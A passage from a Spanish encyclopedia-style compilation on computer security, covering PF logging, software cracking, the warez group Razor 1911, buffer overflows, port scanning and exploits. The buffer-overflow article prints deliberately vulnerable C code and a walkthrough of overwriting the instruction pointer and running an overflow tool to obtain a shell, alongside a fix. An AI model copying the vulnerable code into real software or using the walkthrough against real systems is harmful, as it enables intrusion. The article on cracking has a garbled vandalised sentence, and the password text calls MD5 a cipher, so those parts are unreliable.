PF (software)
# trfico de entrada y salida en la interfaz externa (egress). pass out keep state

57

Registro
El registro PF se configura por reglas dentro de pf.conf. Los logs se manejan en el formato binario de tcpdump/pcap. Se puede acceder a los logs a travs del pseudodispositivo de red llamado 'pflog' mediante una utilidad como tcpdump. Alternativamente la utilidad 'pflogd' puede recoger y colocar logs en el archivo binario de log /var/log/pflog, que tambin puede manejarse con tcpdump, Ethereal y otras aplicaciones similares. El formato tcpdump/pcap ha sido modificado ligeramente para archivar las estadsticas de reglas del firewall, estados de paso/bloqueo, interfaces utilizadas, informacin que slo est disponible con utilidades que tienen en cuenta esta codificacin particular, incluyendo las versiones recientes de tcpdump y Ethereal.

Enlaces externos
Gua del PF de OpenBSD [1] Cancin del OpenBSD [2] con informacin de transfondo acerca de la creacin de PF. Seccin de PF en la web de Daniel Hartmeier [3] Tutorial de PF por Peter N. M. Hansteen [4] (Ingls)

Referencias
[1] [2] [3] [4] http:/ / www. openbsd. org/ faq/ pf/ http:/ / www. openbsd. org/ lyrics. html#36 http:/ / www. benzedrine. cx/ pf. html http:/ / home. nuug. no/ ~peter/ pf/

Cracking (software)

58

Cracking (software)
El cracking es la modificacin del software con la intencin de eliminar los mtodos de proteccin de los cuales este disponga: proteccin de copias, versiones de prueba, nmeros de serie, claves de hardware, verificacin de fechas, verificacin de CD o publicidad y adware. La distribucin y uso de copias modificadas es ilegal en casi todos los pases desarrollados. Muchos juicios se han llevado a cabo debido al cracking de software; sin embargo, la mayora de estos han tenido que ver con la distribucin de copias duplicadas en vez de con el proceso de quebrantar la proteccin, debido a la dificultdad de construir pruebas vlidas de culpabilidad individual en el segundo caso. En Estados Unidos, la aprobacin de la Digital Millennium Copyright Act (DMCA) declar a la modificacin de software, as como a la distribucin de informacin que habilita el cracking de software, ilegal. Sin embargo, la ley ha sido apenas probada en el poder judicial de EE. UU. en casos de ingeniera inversa para nico uso personal. La Unin Europea aprob la Directiva de la Unin Europea sobre derecho de autor en mayo de 2001, haciendo la infraccin de los derechos de autor de software ilegal en los estados miembros, una vez que la legislacin nacional fuera promulgada en favor de la directiva.

Crack informtico
Un crack informtico es un parche cuya finalidad es la de modificar el comportamiento del software original y creado sin autorizacin del desarrollador del programa. Debido al aumento de la piratera a nivel mundial, las grandes empresas del software aplican una serie de restricciones sobre las copias que se distribuyen con la finalidad de prevenir la copia indiscriminada de sus programas. Los cracks eliminan esas restricciones.

Finalidades
Activar software gratuitamente
Para prevenir la instalacin del software sin autorizacin, as como su correspondiente utilizacin, a menudo se emplean claves nicas para cada programa que no se pueden violar usando un keygen normal (generador de claves de activacin). Para evitar esta limitacion, los crackers modifican el programa en si para que una clave falsa pueda ser utilizada, o simplemente se omita el paso de verificacin y el software quede completamente activado y listo para usar. Esta clase de crack hace creer al programa que existe un funcionamiento correcto en el sistema antipirateria cuando en verdad no es as. Normalmente es el archivo ms importante del programa (fichero principal ejecutable) es el que previene la utilizacin de forma ilegal de cracks, aunque la proteccin puede estar aplicada en varios archivos. Al sustituir estos por versiones modificadas se logra eludir esa proteccin. Los desarrolladores de software han creado nuevos sistemas para comprobar la integridad de los archivos e impedir la piratera. Pese a ello, muchos programadores logran evadir la proteccin anti-cracking. y quiatr la kk del seguro ala de unos de otros y se leiste esto es por que sos un nob

Crack informtico

59

Autenticar software fraudulento


Tambin se utiliza para impedir que un software instalado ilegalmente sea detectado como fraudulento. El principal ejemplo son los archivos de autenticacin de Windows o WGA, los cuales detectan si el Windows es legal o ilegal y dan una alarma al usuario. Estos archivos pueden reemplazarle por unos previamente alterados y dar el mensaje al servidor de Microsoft de que la copia de Windows es original.

Liberar limitaciones o periodos de prueba


Debido al crecimiento de la industria del software, es habitual la distribucin de versiones de prueba (shareware)que permiten su uso por tiempo limitado y/o con funcionalidad reducida, dando la posibilidad de comprar el programa completo y as desbloquear sus funciones. Aplicado sobre estas versiones, el crack elimina los lmites impuestos por el fabricante.

Distribucin
La distribucin de cracks, nmeros de serie (serials) y keygen se realiza tanto a travs de redes P2P a nivel mundial, como por va web (mediante descargas directas) o grupos de noticias. Algunos de estos cracks pueden ser en realidad software malintencionado que puede incorporar vulnerabilidades al programa original o contener virus o troyanos camuflados, lo cual puede provocar serios daos a un computador, hasta que incluso tamben puede convertir un computador en parte de una botnet. Aun as, es frecuente que los antivirus detecten un crack como malware sin que este lo sea puesto que es un programa destinado a realizar cambios en el software de otro creador.

Cracker
El trmino cracker (del ingls cracker, romper) se utiliza para referirse a las personas que rompen algn sistema de seguridad.[] Los crackers pueden estar motivados por una multitud de razones, incluyendo fines de lucro, protesta, o por el desafo.[1]

Historia
A partir de 1980 haba aparecido la cultura hacker, programadores aficionados o personas destacadas o con un importante conocimiento de informatica. Estos programadores no solan estar del lado de la ilegalidad, y aunque algunos conocan tcnicas para violar sistemas de seguridad, se mantenan dentro del mbito legal. Pero con el tiempo surgieron personas que utilizando su conocimiento en informtica, aprovechaban debilidades o errores de algunos sistemas informticos y los crackeaban, es decir, burlaban el sistema de seguridad muchas veces entrando en la ilegalidad y algunos considerando estas prcticas como "malas". A estas personas se las continu llamando hackers, por lo que alrededor de 1985 los hackers "originales" empezaron a llamarlos crackers en contraposicin al trmino hacker, en defensa de stos ltimos por el uso incorrecto del trmino.[] Por ello los crackers son criticados por la mayora de hackers, por el desprestigio que les supone ante la opinin pblica y las empresas ya que muchas veces, inclusive en los medios de comunicacin, no hacen diferencia entre el trmino hacker y cracker creando confusin sobre la definicin de los mismos y aparentando un significado diferente.

Cracker

60

Distintos usos del trmino


Se suele referir a una persona como cracker cuando: Mediante ingeniera inversa realiza: seriales, keygens y cracks, los cuales sirven para modificar el comportamiento ampliar la funcionalidad del software o hardware original al que se aplican, y se los suele utilizar para saltearse restricciones como por ejemplo que un programa deje de funcionar a un determinado tiempo, o que slo funcione si es instalado desde un CD original, etc. Viola la seguridad de un sistema informtico y, por ejemplo, toma control de este, obtiene informacin, borra datos, etc. En ambos casos dichas prcticas suelen ser ilegales y penadas por la ley.

Legalidad
Muchos programas informticos, usualmente los privativos, no permiten la modificacin o estudio del funcionamiento del programa, esto hace que el hecho de realizar ingeniera inversa para poder generar un serial o un crack sea ilegal. En ocasiones el cracking es la nica manera de realizar cambios sobre software para el que su fabricante no presta soporte, especialmente cuando lo que se quiere es, o corregir defectos, o exportar datos a nuevas aplicaciones, en estos casos en la mayora de legislaciones no se considera el cracking como actividad ilegal,[citarequerida] incluso a veces la empresa que desarroll el software ya no existe o ya no posee los derechos sobre el producto. A su vez cuando una persona penetra en un sistema ajeno sin su autorizacin, se comete una violacin a la propiedad privada[citarequerida], se suele dar el ejemplo de que es ilegal entrar sin permiso a la casa de otra persona, por ms de que la puerta est abierta. Aunque tambin las tcticas utilizadas por los crackers para violar los sistemas de seguridad suelen ser utilizadas por empresas de seguridad informtica u otras personas para testear la seguridad de un programa o computadora, en dicho caso como se tiene el permiso para realizar el "ataque" o bien, es el mismo dueo de la computadora el que lo realiza, ya no es una prctica ilegal y entrara en disputa tambin el uso del trmino cracker para dichos actos, por esto se han creado diversas leyes que tratan de solucionar estas diferencias.

Referencias Enlaces externos


CrackZ's Reverse Engineering Page (1997-2005) (http://www.woodmann.com/crackz/index.html) (en ingls)

Password cracking

61

Password cracking
El password cracking es un proceso informtico que consiste en descifrar la contrasea de determinadas aplicaciones elegidas por el usuario. Se busca codificar los cdigos de cifrado en todos los mbitos de la informtica. Se trata del rompimiento o desciframiento de claves (passwords). Con los mtodos de cifrado de hoy en da se hace ms difcil el descifrado de claves. En cifrados modernos, como MD5, resulta imposible encontrar una coherencia lgica entre el texto cifrado y el descifrado, ya que cada clave ha sido generada a partir de una cadena diferente llamada "semilla". As han tenido que evolucionar los sistemas de rotura de claves (hasta el uso de las increbles "rainbow tables"), buscando no encontrar una coherencia lgica, sino el cifrado de nuevas cadenas con las que se guarde similitud con el texto cifrado, siendo una tarea ardua y que requiere, habitualmente, un buen equipo para romperlas (algunas pueden tardar incluso aos en romperse).

Razor 1911
Razor 1911

Acrnimo Tipo Fundacin Fundador(es)

RZR warez / demo 1985 Doctor No Insane TTM Sector9 Noruega Mundial Razor 1911 [1]

Sede mbito Sitio web

Razor 1911 (RZR) es un grupo de warez y de demos, con una historia similar a la de Fairlight. Segn la divisin de delitos informticos del Departamento de Justicia de los Estados Unidos, Razor 1911 es la "red de piratera de software de juegos ms antigua de Internet".[2]

Historia
El grupo fue fundado originalmente como Razor 2992 por el Doctor No, Insane TTM y Sector9 en Noruega en octubre de 1985 como grupo de cracking para Commodore 64. Poco despus, se cambi de 2992 a 1911 como un dardo a otros crackers que tendan a sobreutilizar el nmero 666 (el sufijo "1911" se traduce a 777 en hexadecimal). Entre 1987 y 1988 el grupo comenz a alejarse de la Commodore 64 y emigraron a una nueva plataforma de hardware, codificando demos y crackeando juegos para Amiga. En la dcada de los noventa, Razor 1911 experiment otra transicin, esta vez a IBM PC. Razor era el grupo dominante de suministro desde 1992 hasta que los disquetes fueron abandonados por los CD-ROM. A lo largo de la dcada de los noventa Razor se encuentran con la competencia de muchos grupos diferentes, con grupos como TRSi, El Dream Team (TDT) y Fairlight (FLT), Prestige e Hybrid (HBD). Podra decirse por esa poca, Razor fue revitalizado por la incorporacin de nuevos miembros procedentes de otro grupo,

Razor 1911 Nexus, que trajeron con ellos algunos proveedores de Reino Unido y los lderes del Speed Racer (TSR), Hot Tuna y LThe Gecko. En Razor tambin haba un puado de otros lderes durante el decenio de 1990, como Zodact, The Renegade Chemist (CVR), el Rey Brujo, Butcher, Marauder, y Randall Flagg. En 1995 los disquetes son suplantados rpidamente por los CD-ROM, por lo que Razor 1911 se traslad a la escena de ripeado de CD-ROM. Aunque no es la primera en comenzar con el ripeo, Razor tuvo mucho xito y se convirti en uno de los grupos predominantes. La tripulacin que llev Razor en este nuevo captulo incluye miembros como: TSR, Faran, Error Fatal, tercer hijo, La_Plaga, Hot Tuna, Beowulf, Pitbull, Bunter, Manhunter, Vitas, y The Punisher. Razor domin el panorama hasta que Prestige se form, la cual posteriormente se fusionara con Class (CLS), que seran una fuerte competencia de Razor. Razor, una vez ms, asumi un nuevo desafo cuando la escena de la ISO se form. Liderado por The Punisher, Razor comenz su recuperacin. Tras la jubilacin de The Punisher, Razor fue dirigido por diferentes personas y sufri algunos problemas internos de liderazgo. Esto se resolvi cuando Pitbull, un antiguo miembro de Razor en los noventa, asumi el rol. l era an lder cuando tuvo lugar la Operacin bucanero, una operacin internacional de lucha contra la piratera que afect a este grupo entre otros. Actualmente Razor ha sido amenazado por Ubisoft, de que si llegaran a hacer un crack de Assassin's Creed 2 le haran investigar con el FBI. De este modo Razor no pudo lanzar un crack de Assasin's Creed 2, por lo que lo hizo Skidrow, transformndose en su principal competencia debido al lanzamiento de cracks ms rpidos, por eso Razor ha perdido un poco de popularidad.

62

Miembros arrestados
Shane Pitman E. de 31 aos de edad, de Conover, Carolina del Norte. Uno de los lderes de Razor 1911 conocido por el pseudnimo de "Pitbull", fue condenado a 18 meses en la crcel "por conspiracin para violar leyes de derechos de autor" como parte de la Operacin bucanero.[3] Sean Michael Breen de 38 aos de edad, de Richmond, California. Uno de los lderes de Razor 1911 desde comienzos de la dcada de los noventa. Fue condenado 10 de febrero de 2004 a 50 meses de prisin y tres aos de libertad vigilada. Es la pena ms larga impuesta hasta la fecha a las ms de 40 personas en todo el mundo afectados por la Operacin bucanero.

Retorno
Casi exactamente en la fecha en la que Sean Michael Breen fue puesto en libertad, Razor 1911 comenz nuevamente la liberacin de juegos. Desde entonces, han seguido liberando juegos de forma constante, y actualmente parece ser uno de los grupos de cracking ms prolficos. Shane Pitman ya no participa con el grupo y tiene un papel prominente en los foros populares Neowin.net.

Logros
El 23 de julio de 1996, Razor 1911 lanz Quake el da despus de su lanzamiento. El 14 de octubre de 2006, Razor 1911 lanz Battlefield 2142 a la escena cinco das antes de su lanzamiento oficial. En 2007, Razor 1911 fue el primer grupo con xito en crackear un juego exclusivo de Windows Vista, Shadowrun, para que se ejecutase en Windows XP. Este hecho apoy la creencia de que Microsoft est tratando de publicar la mayora de los juegos nuevos para Vista nicamente con el fin de impulsar las ventas de su sistema operativo. El 11 de noviembre de 2007, Razor 1911 cracke y liber la versin europea de Crysis cinco das antes de su fecha de lanzamiento oficial. El 7 de diciembre de 2008, Razor 1911 public Grand Theft Auto IV, cinco das despus de su lanzamiento. En el proceso se logr romper la proteccin SecuROM.

Razor 1911 El 25 de mayo de 2009, Los Sims 3 fue publicado, ocho das antes de su lanzamiento. El 20 de noviembre de 2009, Razor 1911 fue el primero en liberar otra vez Left 4 Dead 2. El 21 de enero del 2010 Mass Effect 2 fue publicado, 5 das antes de su lanzamiento. El 8 de febrero de 2010, Razor 1911 lanzo Bioshock 2, un da antes del lanzamiento oficial del juego. El 24 de febrero del 2010 y varios dias antes de su puesta a la venta Napoleon: Total War sale publicado en la red. El 2 de marzo de 2010, Razor 1911 lanz Supreme Commander 2, el mismo da despus del lanzamiento oficial del juego. El 4 de marzo del 2010 y 9 dias antes de su salida oficial, Battlefield Bad Company 2 sale publicado en la red. El 21 de septiembre del 2010 y 3 dias antes de su salida oficial, F1 2010 sale publicado en la red. El 16 de noviembre de 2010, un dia antes de su salida oficial, Harry Potter y las Reliquias de la Muerte - Parte 1 (videojuego) sale publicado en la red. El 6 de diciembre de 2010, Razor 1911 anuncio que alojaran en su web un espejo de WikiLeaks, wikileaks.razor1911.com [4].[5]

63

Referencias
[1] http:/ / www. razor1911. com/ [2] Former Leader of Razor 1911, the Oldest Game Software Piracy Ring on the Internet, Sentenced (http:/ / www. cybercrime. gov/ pitmanSent. htm) [3] Shane Pitman conocido como Pitbull (http:/ / www. defacto2. net/ groups/ razor1911/ pitbull. htm) [4] http:/ / wikileaks. razor1911. com/

Desbordamiento de bfer
En seguridad informtica y programacin, un desbordamiento de buffer (del ingls buffer overflow o buffer overrun) es un error de software que se produce cuando un programa no controla adecuadamente la cantidad de datos que se copian sobre un rea de memoria reservada a tal efecto (buffer), de forma que si dicha cantidad es superior a la capacidad preasignada los bytes sobrantes se almacenan en zonas de memoria adyacentes, sobrescribiendo su contenido original. Esto constituye un fallo de programacin. En las arquitecturas comunes de computadoras no existe separacin entre las zonas de memoria dedicadas a datos y las dedicadas a programa, por lo que los bytes que desbordan el buffer podran grabarse donde antes haba instrucciones, lo que implicara la posibilidad de alterar el flujo del programa, llevndole a realizar operaciones imprevistas por el programador original. Esto es lo que se conoce como una vulnerabilidad. Una vulnerabilidad puede ser aprovechada por un usuario malintencionado para influir en el funcionamiento del sistema. En algunos casos el resultado es la capacidad de conseguir cierto nivel de control saltndose las limitaciones de seguridad habituales. Si el programa con el error en cuestin tiene privilegios especiales constituye en un fallo grave de seguridad. Se denomina shellcode al cdigo ejecutable especialmente preparado que se copia al host objeto del ataque para obtener los privilegios del programa vulnerable. La capacidad de los procesadores modernos para marcar zonas de memoria como protegidas puede usarse para aminorar el problema. Si se produce un intento de escritura en una zona de memoria protegida se genera una excepcin del sistema de acceso a memoria, seguido de la terminacin del programa. Por desgracia para que esta tcnica sea efectiva los programadores han de indicar al sistema operativo las zonas que se necesita proteger, programa a programa y rutina a rutina, lo que supone un problema para todo el cdigo heredado.

Desbordamiento de bfer

64

Descripcin tcnica
Un desbordamiento de bffer ocurre cuando los datos que se escriben en un bffer corrompen aquellos datos en direcciones de memoria adyacentes a los destinados para el bffer, debido a una falta de validacin de los datos de entrada. Esto se da comnmente al copiar cadenas de caracteres de un bffer a otro.

Ejemplo bsico
En este ejemplo, un programa tiene definidos dos elementos de datos continuos en memoria: un buffer de 8 bytes tipo string, A, y otro de dos bytes tipo entero, B. Al comienzo, A contiene bytes nulos y B contiene el nmero 3 (cada carcter se representa mediante un byte).
0 0 0 0 0 0 0 0 Buffer A 0 3

Buffer B

A continuacin, el programa intenta almacenar la cadena de caracteres "demasiado" en el buffer A, seguido de bytes nulos para marcar el fin de string. Al no validarse la longitud de la cadena, se sobrescribe el valor de B:
'd' 'e' 'm' 'a' 's' 'i' 'a' 'd' Buffer A 'o' 0

Buffer B

A pesar de que el programador no quera cambiar el contenido del bffer B, el valor de ste ha sido reemplazado por un nmero equivalente a parte de la cadena de caracteres. Para este ejemplo, en un sistema big-endian que use ASCII, el carcter 'o' seguido del byte nulo equivale al nmero 28416. Si B fuese la nica variable aparte de A definida en el programa, la escritura de datos que sobrepasen los lmites de B generaran un error como segmentation fault, concluyendo as el programa.

Cdigo fuente de ejemplo


En el siguiente ejemplo se presenta un cdigo fuente en C con un error de programacin. Una vez compilado, el programa generar un desbordamiento de buffer si se lo invoca desde la lnea de comandos con un argumento lo suficientemente grande, pues este argumento se usa para llenar un buffer, sin validar previamente su longitud.[1] /* overflow.c - demuestra un desbordamiento de buffer */ #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { char buffer[10]; if (argc < 2) { fprintf(stderr, "MODO DE USO: %s string\n", argv[0]); return 1; } strcpy(buffer, argv[1]); return 0; }

Desbordamiento de bfer Strings de 9 caracteres o menos no provocarn desbordamiento de buffer. Por el contrario, strings de 10 caracteres o ms, s: Esto siempre es incorrecto, aunque no siempre resultar en un error del programa o segmentation fault. Este programa puede reescribirse en forma ms segura usando la funcin strncpy de la siguiente manera:[1] /* mejor.c - demuestra un mtodo de resolver el problema */ #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { char buffer[10]; if (argc < 2) { fprintf(stderr, "MODO DE USO: %s string\n", argv[0]); return 1; } strncpy(buffer, argv[1], sizeof(buffer)); buffer[sizeof(buffer) - 1] = '\0'; return 0; }

65

Historia de abusos
Uno de los primeros aprovechamientos de los que hay registro de desbordamiento de bfers fue en 1988. Fue uno de los muchos que us el gusano Morris para propagarse en Internet. El programa abusado fue un servicio de Unix llamado fingerd.[2] Ms tarde, en 1995, Thomas Lopatic redescubri en forma independiente el desbordamiento de bfer y public sus descubrimientos en la lista de correo sobre seguridad Bugtraq.[3] Un ao despus, en 1996, Elias Levy (conocido tambin como Aleph One) public en la revista Phrack su artculo "Smashing the Stack for Fun and Profit",[4] una introduccin paso a paso para aprovecharse de vulnerabilidades de desbordamientos de bfer basados en la pila. Desde entonces, por lo menos dos de los gusanos ms importantes de Internet se han aprovechado de los desbordamientos de bfer para comprometer un gran nmero de sistemas. En 2001, el gusano Code Red se aprovech de un desbordamiento de bfer en el Internet Information Services (IIS) 5.0 de Microsoft[5] y en 2003 el gusano SQL Slammer comprometi mquinas corriendo Microsoft SQL Server 2000.[6]

Stack smashing
El pisado de pila o stack smashing es un tipo de desbordamiento de buffer que es aprovechado por algunos virus y otros programas maliciosos para tomar control sobre una aplicacin, o provocar su terminacin. Esto sucede cuando, por algn error imprevisto, se ingresa a la pila de la aplicacin ms datos que los que sta puede contener, lo que provoca que esta se "desborde" y algunos datos se sobreescriban. Para evitar que suceda esto, los compiladores se mejoran cada da dejndole tiempo al programador para pensar en lo que realmente importa. La siguiente sera una explicacin de qu es, cmo se hace y cmo se previene el desbordamiento de pila, con el valor agregado de posibilitar una nueva herramienta que nos ayudar a explicar errores de programacin. El siguiente ejemplo est inspirado en la funcionalidad incluida en el nuevo compilador por defecto de la distribucin Debian (en su versin inestable): Miremos, primero que nada, un ejemplo. Este es un ejemplo comn de un programa C vulnerable:

Desbordamiento de bfer #include <stdio.h> #include <string.h> int main( int argc, char *argv[] ) { // Buffer esttico en la pila. char buffer[1024]; if ( argc != 2 ) { printf("Uso: %s argumento\n", argv[0] ); return( -1 ); } // Copiado de cadenas sin control. strcpy( buffer, argv[1]); printf( "Argumento copiado\n" ); return(0); } Este programa simple acepta un argumento y lo copia a un buffer esttico. Este es un error de programacin clsico, si este programa fuese compilado a un ejecutable setuid/setgid (ejecutable por cualquiera como si fuese el dueo) permitira a un atacante ganar permisos fcilmente. Como vamos a demostrar las nuevas funciones del nuevo compilador, asegrense de compilar el ejemplo anterior con gcc-3.3 de la siguiente forma: user@pc:/tmp$ gcc-3.3 -o buggy buggy.c Veamos ahora si lo podemos romper. Primero dos pruebas de ejecucin. user@pc:/tmp$ /tmp/buggy Uso: /tmp/buggy argumento user@pc:/tmp$ /tmp/buggy test Argumento copiado Ambas ejecuciones funcionaron como se esperaba. Ahora probemos pasarle un argumento ms largo para ver si podemos desbordar el buffer esttico: user@pc:/tmp$ ./buggy `perl -e 'print "X"x2048'` Argumento copiado Violacin de segmento Tuvimos xito: desbordamos el buffer con nuestro argumento de 2k, lo que result en una violacin de segmento. Ahora, si podemos producir un archivo de ncleo podramos debuguearlo: user@pc:/tmp$ ulimit -c 09999999 user@pc:/tmp$ ./buggy `perl -e 'print "X"x3333'` Argumento copiado Violacin de segmento (con archivo de ncleo) Al correr gdb podremos ver el programa: user@pc:/tmp$ gdb ./buggy core GNU gdb 6.4.90-debian ...

66

Desbordamiento de bfer El programa finaliz con seal 11, Violacin de segmento #0 0x58585858 in ?? () (gdb) info registers eip eip 0x58585858 0x58585858 Aqu podemos ver que el puntero de instrucciones - registro del procesador que indica qu ser lo que se ejecutar a continuacin es 058585858 (058 es X en hexadecimal). Esto significa que efectivamente tomamos el control del ejecutable con nuestro script malicioso. El explotar el ejecutable para correr una lnea de comandos habiendo hecho esto es trivial y, por lo general, puede ser automatizado:
user@pc:~/cmd-overflow$ make gcc-3.3 -o cmd-overflow -Wall -ggdb cmd-overflow.c gcc-3.3 -o cmd-vuln -Wall -ggdb cmd-vuln.c user@pc:~/cmd-overflow$ ./cmd-overflow --target=/tmp/buggy --args='%' --size=2048 Argumento copiado shell-3.1$ id uid=1000(user) gid=1000(user) groups=29(audio), 44(video), 46(plugdev), 100(users), 1000(user) shell-3.1$ exit exit

67

Utilizamos aqu un simple programa para crear un argumento de 2048 bytes de longitud que contiene el cdigo requerido para correr una lnea de comandos, y luego corrimos nuestro programa defectuoso con este argumento construido a medida. Se desbord el buffer al correr nuestro cdigo, lo que result en la ejecucin de una lnea de comandos. Si nuestro programa hubiese sido ejecutado en Linux en setuid por un super-usuario hubisemos ganado los privilegios del sper-usuario!!

Referencias
[1] [2] [3] [4] [5] [6] Safer C: Developing Software for High-integrity and Safety-critical Systems (ISBN 0-07-707640-0) "Tour del gusano" por Donn Seeley, Universidad de Utah (http:/ / world. std. com/ ~franl/ worm. html) Bugtraq security mailing list (http:/ / www. security-express. com/ archives/ bugtraq/ 1995_1/ 0403. html) "Smashing the Stack for Fun and Profit" by Aleph One (http:/ / doc. bughunter. net/ buffer-overflow/ smash-stack. html) eEye Digital Security (http:/ / www. eeye. com/ html/ Research/ Advisories/ AL20010717. html) Microsft Technet Security Bulletin MS02-039 (http:/ / www. microsoft. com/ technet/ security/ bulletin/ ms02-039. mspx)

Escner de puertos

68

Escner de puertos
El trmino escner de puertos o escaneo de puertos se emplea para designar la accin de analizar por medio de un programa el estado de los puertos de una mquina conectada a una red de comunicaciones. Detecta si un puerto est abierto, cerrado, o protegido por un cortafuegos. Se utiliza para detectar qu servicios comunes est ofreciendo la mquina y posibles vulnerabilidades de seguridad segn los puertos abiertos. Tambin puede llegar a detectar el sistema operativo que est ejecutando la mquina segn los puertos que tiene abiertos. Es usado por administradores de sistemas para analizar posibles problemas de seguridad, pero tambin es utilizado por usuarios malintencionados que intentan comprometer la seguridad de la mquina o la red. Existen varios programas escaneadores de puertos por la red. Uno de los ms conocidos es Nmap, disponible tanto para Linux como Windows.

Rastreo de puertos TCP SYN scan


Para establecer una conexin normal TCP, es necesario seguir una negociacin de tres pasos. Esta negociacin es iniciada con un paquete SYN en la mquina de origen, al que la mquina de destino corresponde con un paquete SYN/ACK, que es finalmente respondido por la mquina que inicia la conexin por un paquete ACK. Una vez que se han cumplido estos pasos, est hecha la conexin TCP. Un rastreador de puertos enva muchos paquetes SYN a la mquina que se est probando, y mira de qu forma regresan los paquetes para ver el estado de los puertos en el destino, interpretndolos de la siguiente forma: - Si al enviar un paquete SYN a un puerto especfico, el destino devuelve un SYN/ACK, el puerto est abierto y escuchando conexiones. - En otro caso, si regresa un paquete RST, el puerto est cerrado. - Por ltimo, si no regresa el paquete, o si se recibe un paquete ICMP Port Unreachable, el puerto est filtrado por algn tipo de cortafuegos. Haciendo este procedimiento para una lista de puertos conocidos, se logra obtener un informe de estado de los puertos de la mquina probada.

Rastreo de puertos UDP


Aunque el protocolo UDP no est orientado a la conexin, es posible realizar un escaneo. No tiene un paquete SYN como el protocolo TCP, sin embargo si un paquete se enva a un puerto que no est abierto, responde con un mensaje ICMP Port Unreachable. La mayora de los escners de puertos UDP usan este mtodo, e infieren que si no hay respuesta, el puerto est abierto. Pero en el caso que est filtrado por un firewall, este mtodo dar una informacin errnea. Una opcin es enviar paquetes UDP de una aplicacin especfica, para generar una respuesta de la capa de aplicacin. Por ejemplo enviar una consulta DNS.

Escner de puertos

69

Escneres de puertos en lnea


Listado de escners [1] Zona gratuita [2] Puertos Abiertos [3] En espaol, por grupos o personalizados. (Seguridad, Troyanos y servers) ADSLZone [4] Sygate Online Scan [5] extended security check (Stealth Scan, Trojan Scan) Crucialtests [6] concise, incl. advisor (actualmente no esta en linea) AuditMyPC Free Port Scanning [7] Can scan all 65535 ports.

Referencias
[1] [2] [3] [4] [5] [6] [7] http:/ / www. adslayuda. com/ test-scan. html http:/ / www. zonagratuita. com/ servicios/ seguridad/ scan-online. html http:/ / www. puertosabiertos. com/ http:/ / www. adslzone. net/ scanpuertos. html http:/ / scan. sygate. com/ http:/ / www. crucialtests. com/ http:/ / www. auditmypc. com/ freescan/ scanoptions. asp

Exploit
Exploit (del ingls to exploit, explotar o aprovechar) es una pieza de software, fragmento de datos o secuencia de comandos y/o acciones, utilizada con el fin de aprovechar una vulnerabilidad de seguridad de un sistema de informacin para conseguir un comportamiento no deseado del mismo. Ejemplos de comportamiento errneo: Acceso de forma no autorizada, toma de control de un sistema de cmputo, consecucin privilegios no concedidos lcitamente, consecucin de ataques de denegacin de servicio. Hay que observar que el trmino no se circunscribe a piezas de software, por ejemplo cuando lanzamos un ataque de ingeniera social, el ardit o discurso que preparamos para convencer a la vctima tambin se considera un exploit.[1] Lo exploits pueden tomar forma en distintos tipos de software, como por ejemplo scripts, virus informticos o gusanos informticos,

Clasificacin
Segn la forma en la que el exploit contacta con el software vulnerable:[2] Exploit remoto.- Si utiliza una red de comunicaciones para entrar en contacto con el sistema vctima. Por ejemplo puede usar otro equipo dentro de la misma red interna o tener acceso desde la propia Internet. Exploit local.- Si para ejecutar el exploit se necesita tener antes acceso a el sistema vulnerable. Por ejemplo el exploit puede aumentar los privilegios del que lo ejecuta. Este tipo de exploits tambin puede ser utilizado por un atacante remoto que ya tiene acceso a la mquina local mediante un exploit remoto. Exploit ClientSide.[1]- Aprovechan vulnerabilidades de aplicaciones que tpicamente estn instaladas en gran parte de las estaciones de trabajo de las organizaciones. Ejemplos tpicos de este tipo de software son aplicaciones ofimticas (Ej. Microsoft Office, Open Office), lectores de PDF (Ej. Adobe Acrobat Reader), navegadores (Ej. Internet Explorer, Firefox, Chrome, Safari), reproductores multimedia (Ej. Windows Media Player, Winamp, iTunes). El exploit est dentro de ficheros interpretados por este tipo de aplicaciones y que llega a la mquina objetivo por distintos medios (Ej email o pendrive). El archivo ser usado por el programa y si no es detenido por ningn otro programa (Ej. firewall o antivirus) aprovechar la vulnerabilidad de seguridad. Las peculiaridades de este tipo de ataques son:

Exploit Requieren la intervencin del usuario del lado del cliente. Por ejemplo necesitan que abra cierto archivo o que haga click en cierto link Es un ataque asincrnico porque el momento en que se lanza no es el mismo en que se consigue ejecutar el exploit (ya que necesita la accin del usuario). Se lanza a ciegas, no se sabe qu aplicaciones y versiones de esta utiliza el objetivo real. Segn el propsito de su ataque:[2] Curiosidad Fama personal Beneficio personal Espionaje

70

Frameworks de exploits
Los frameworks de exploits son paquetes software de apoyo que contienen mdulos que ayudan para la construccin de exploits.[3][1] Estos frameworks permiten la reutilizacin del cdigo, la estandarizacin de los exploits y la simplificacin del proceso de ataques. Ejemplos de este tipo de frameworks: Metasploit Framework, Core Impact [4], Inmunity Canvas

"Exploits" en los videojuegos


Hasta ahora el juego en internet ms afectado por estos comandos maliciosos es Roblox, el cual es afectado en los servidores publicados en la red. Un "Cracker" con ayuda de un programa especial edita los cdigos del servidor activo, causando desde la aparicin de nuevos elementos en el juego, hasta la desconexin de todos los jugadores y robo de su informacin actual en el sitio.

Referencias
[1] [2] [3] [4] Federico G. Pacheco, Hector Jara, "Ethical Hacking 2.0". Ed. Fox Andina 2012 Andrew Cencini et ali., "Software Vulnerabilities: Full-, Responsible-, and Non-Disclosure". Diciembre 2005. Chris McNab,"Network Security Assessment: Know Your Network". Ed. O'Reilly 2004 http:/ / www. coresecurity. com/ content/ core-impact-overview

Seguridad informtica

71

Seguridad informtica
La seguridad informtica o seguridad de tecnologas de la informacin, es el rea de la informtica que se enfoca en la proteccin de la infraestructura computacional y todo lo relacionado con sta (incluyendo la informacin contenida). Para ello existen una serie de estndares, protocolos, mtodos, reglas, herramientas y leyes concebidas para minimizar los posibles riesgos a la infraestructura o a la informacin. La seguridad informtica comprende software, bases de datos, metadatos, archivos y todo lo que la organizacin valore (activo) y signifique un riesgo si sta llega a manos de otras personas. Este tipo de informacin se conoce como informacin privilegiada o confidencial. El concepto de seguridad de la informacin no debe ser confundido con el de seguridad informtica, ya que este ltimo slo se encarga de la seguridad en el medio informtico, pero la informacin puede encontrarse en diferentes medios o formas, y no solo en medios informticos. La seguridad informtica es la disciplina que se ocupa de disear las normas, procedimientos, mtodos y tcnicas destinados a conseguir un sistema de informacin seguro y confiable.

Objetivos
